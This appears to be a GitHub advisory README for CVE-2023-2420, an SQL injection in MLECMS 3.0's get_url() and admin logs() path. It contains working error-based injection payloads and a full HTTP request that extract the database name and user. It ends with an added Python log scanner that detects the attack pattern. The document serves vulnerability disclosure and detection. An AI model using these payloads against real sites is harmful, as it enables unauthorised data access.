CVE-2023-2420: elecms/README.md at main · VG00000/elecms
A vulnerability was found in MLECMS 3.0. It has been rated as critical. This issue affects the function get_url in the library /upload/inc/lib/admin of the file upload\inc\include\common.func.php. The manipulation of the argument $_SERVER['REQUEST_URI'] leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227717 was assigned to this vulnerability.

Source code download address: http://www.mlecms.com/download/zip/mlecms-3.0.zip

Operating environment: Nginx + MySQL
A vulnerability exists in the get_url() function at lines 40-53 of upload\inc\include\common.func.php. The function reads the URL directly from $_SERVER and returns it without any filtering, which can lead to SQL injection or XSS.

A global search for get_url shows that it is called in /upload/inc/lib/admin.lib.php, where its return value is concatenated directly into an SQL statement.

In that file, at line 49, the risky SQL statement is located in the logs() method.

Tracking the logs method further, it is called on lines 13 and 16 of \upload\admin\channel_manage.php.

Analysing the routing together with the file name locates the function point at 网站频道管理 (Website Channel Management).

In channel_manage.php, admin::logs is executed only when $_GET['del'] is a number and $ass['id'] is empty.
Analysis and testing of $db->query show that when the channel ID requested for deletion is greater than any existing channel ID, $ass['id'] is null. Because $_GET['del'] must be a number while the vulnerable value is the raw URL itself, the extra characters have to be placed in the URL without changing the numeric del parameter. Combined with the SQL statement, the following error-based injection queries the database name: channel_manage.php?del=1111#'or updatexml(1,concat(0x7e,database()),0) or'

Querying the user: the test environment is Nginx + MySQL. If other middleware is used, the request packet may need to be reconstructed:

```http
GET /admin/channel_manage.php?del=1111#'or updatexml(1,concat(0x7e,user()),0) or' HTTP/1.1
Host: 192.168.31.128:90
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=1ohoqsk1aaiaj81sr1ngt5phm0; mlecms_global_language=1
Connection: close
```
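As an added detection check, not part of the original write-up or of MLECMS, the following Python scans Nginx access-log lines for requests to channel_manage.php whose raw del= value is not purely numeric, which is exactly the shape the request above has to take because admin::logs() only runs when the parsed $_GET['del'] is a number while get_url() still returns the raw $_SERVER['REQUEST_URI']. The combined log format and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Nginx's default "combined" log format (not taken from the page).
# Line 2 mirrors the request above, with spaces percent-encoded as a client would send them.
SAMPLE_LOG = """\
192.0.2.10 - - [01/May/2023:10:00:00 +0000] "GET /admin/channel_manage.php?del=12 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.11 - - [01/May/2023:10:00:01 +0000] "GET /admin/channel_manage.php?del=1111#'or%20updatexml(1,concat(0x7e,database()),0)%20or' HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.12 - - [01/May/2023:10:00:02 +0000] "GET /admin/channel_manage.php?del=7&lang=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.13 - - [01/May/2023:10:00:03 +0000] "GET /index.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
DEL_RE = re.compile(r'[?&]del=(?P<raw>[^&]*)')
# Tokens that signal the error-based technique used in the request above.
SQL_HINT = re.compile(r"['#]|updatexml|concat\(", re.IGNORECASE)


def inspect_request(uri: str):
    # channel_manage.php only calls admin::logs() when $_GET['del'] is numeric, but get_url()
    # returns the raw REQUEST_URI, so everything after the digits (a '#' fragment, a quote, SQL)
    # still reaches the query. A non-numeric tail after del= is therefore the thing to alert on.
    if "/channel_manage.php" not in uri:
        return None
    m = DEL_RE.search(uri)
    if m is None:
        return None
    raw = unquote(m.group("raw"))
    if raw.isdigit():
        return None  # well-formed: only digits follow del=
    reason = "sql-like tail after del=" if SQL_HINT.search(raw) else "non-numeric tail after del="
    return {"raw_del": raw, "reason": reason}


def scan_log(text: str):
    # Parse combined-format lines and collect findings from inspect_request().
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        finding = inspect_request(m.group("uri"))
        if finding:
            finding.update(ip=m.group("ip"), status=m.group("status"))
            findings.append(finding)
    return findings
```

Running scan_log(SAMPLE_LOG) flags only the second line; the request with an extra benign parameter (del=7&lang=1) passes because the del value itself is all digits.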